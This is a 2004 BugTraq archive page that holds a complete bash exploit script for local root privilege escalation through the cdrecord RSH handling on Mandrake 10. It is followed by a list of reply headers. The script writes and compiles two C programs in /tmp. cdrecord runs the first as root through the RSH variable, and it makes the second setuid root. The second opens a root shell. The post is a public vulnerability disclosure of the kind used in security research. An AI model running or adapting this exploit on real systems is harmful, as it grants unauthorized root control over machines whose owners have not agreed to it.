BugTraq
cdrecord local root exploit Sep 10 2004 01:30AM
newbug Tseng (newbug chroot org) (1 replies)


#!/bin/bash

echo "cdr-exp.sh -- CDRecord local exploit ( Tested on cdrecord-2.01-0.a27.2mdk + Mandrake10)"

echo "Author : newbug [at] chroot.org"

echo "IRC : irc.chroot.org #chroot"

echo "Date :09.09.2004"

cd /tmp

cat > s.c <<_EOF_

#include <unistd.h>

#include <sys/types.h>

#include <stdio.h>

int main()

{

setuid(0);setgid(0);

chown("/tmp/ss", 0, 0);

chmod("/tmp/ss", 04755);

return 0;

}

_EOF_

cat > ss.c <<_EOF_

#include <stdio.h>

int main()

{

setuid(0);setgid(0);

execl("/bin/bash","bash",(char *)0);

return 0;

}

_EOF_

gcc -o s s.c

gcc -o ss ss.c

export RSH=/tmp/s

cdrecord dev=REMOTE:newbug (at) brk.chroot (dot) org [email concealed]:0,0,0 /blah/blah >/dev/null 2>&1

/tmp/ss

[ reply ]
Re: cdrecord local root exploit Sep 12 2004 05:10PM
Sean Davis (dive endersgame net) (1 replies)
Re: cdrecord local root exploit Sep 14 2004 01:51AM
Volker Kuhlmann (list0570 paradise net nz) (2 replies)
Re: cdrecord local root exploit Sep 15 2004 03:48PM
Coleman (cokane cokane org) (1 replies)
Re: cdrecord local root exploit Sep 16 2004 05:57PM
Jason T. Miller (jasomill shaffstall com) (1 replies)
Re: cdrecord local root exploit Sep 27 2004 07:49AM
Dr Andrew C Aitchison (A C Aitchison dpmms cam ac uk) (1 replies)
Re: cdrecord local root exploit Sep 28 2004 06:22AM
Jason T. Miller (jasomill shaffstall com) (1 replies)
Re: cdrecord local root exploit Oct 01 2004 05:26PM
Greg A. Woods (woods planix com) (1 replies)
Re: cdrecord local root exploit Oct 01 2004 09:16PM
Jason T. Miller (jasomill theoneview com)
Re: cdrecord local root exploit Sep 15 2004 11:15AM
Marcus Meissner (meissner suse de)


 

Privacy Statement
Copyright 2010, SecurityFocus